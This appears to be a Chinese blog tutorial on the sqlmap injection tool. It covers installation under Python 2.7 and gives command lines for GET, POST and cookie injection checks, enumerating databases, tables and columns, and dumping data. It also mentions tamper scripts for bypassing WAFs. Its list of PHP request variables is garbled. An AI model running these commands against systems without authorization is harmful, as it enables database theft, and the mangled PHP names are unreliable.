您的位置:首页 > 数据库

小迪教程第八天——注入工具sqlmap的使用

2017-10-17 20:24 483 查看

1、安装过程

1)安装python2.7

2)在python2.7的目录中解压sqlmap



3)在桌面建立快捷方式



2、使用方法

1)get类型注入

Sqlmap.py -u 注入地址

检测指定站点注入情况,默认会以get类型注入检测



2)post类型注入



3)cookie类型注入

Sqlmap.py -u 注入地址 –cookie “参数” –level 2

以cookie注入提交检测网站



4)获取表信息

列表名: Sqlmap.py -u 注入地址 –tables



5)列指定表名下的列名

Sqlmap.py -u 注入地址 –columns -T 表名



6)取指定表名列名下的数据

Sqlmap.py -u 注入地址 –dump -C “列名” -T 表名





7)其他使用

Sqlmap.py -u 注入地址 检测指定站点注入情况

默认会以get类型注入检测

Sqlmap.py -u 注入地址 –data “参数”

以post注入提交检测网站

Sqlmap.py -u 注入地址 –cookie “参数” –level 2

以cookie注入提交检测网站

Sqlmap.py -u 注入地址 –dbs 列数据库

Sqlmap.py -u 注入地址 –current-db 当前数据库名

Sqlmap.py -u 注入地址 –tables 列表名

Sqlmap.py -u 注入地址 –columns -T 表名 列指定表名下的列名

Sqlmap.py -u 注入地址 –dump -C “列名” -T 表名 获取指定表名下的列名的数据

3、高级技能

使用sqlmap中的其他插件,如使用tamper脚本绕过waf注入

4、其他内容

asp语言

Request 全部接受

Request.querystring get传递

Request.form post传递

Request.cookie cookie传递

php语言

REQUEST_GET

POST_COOKIE

$_SERVER
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  cookie
相关文章推荐
新的分享
章节导航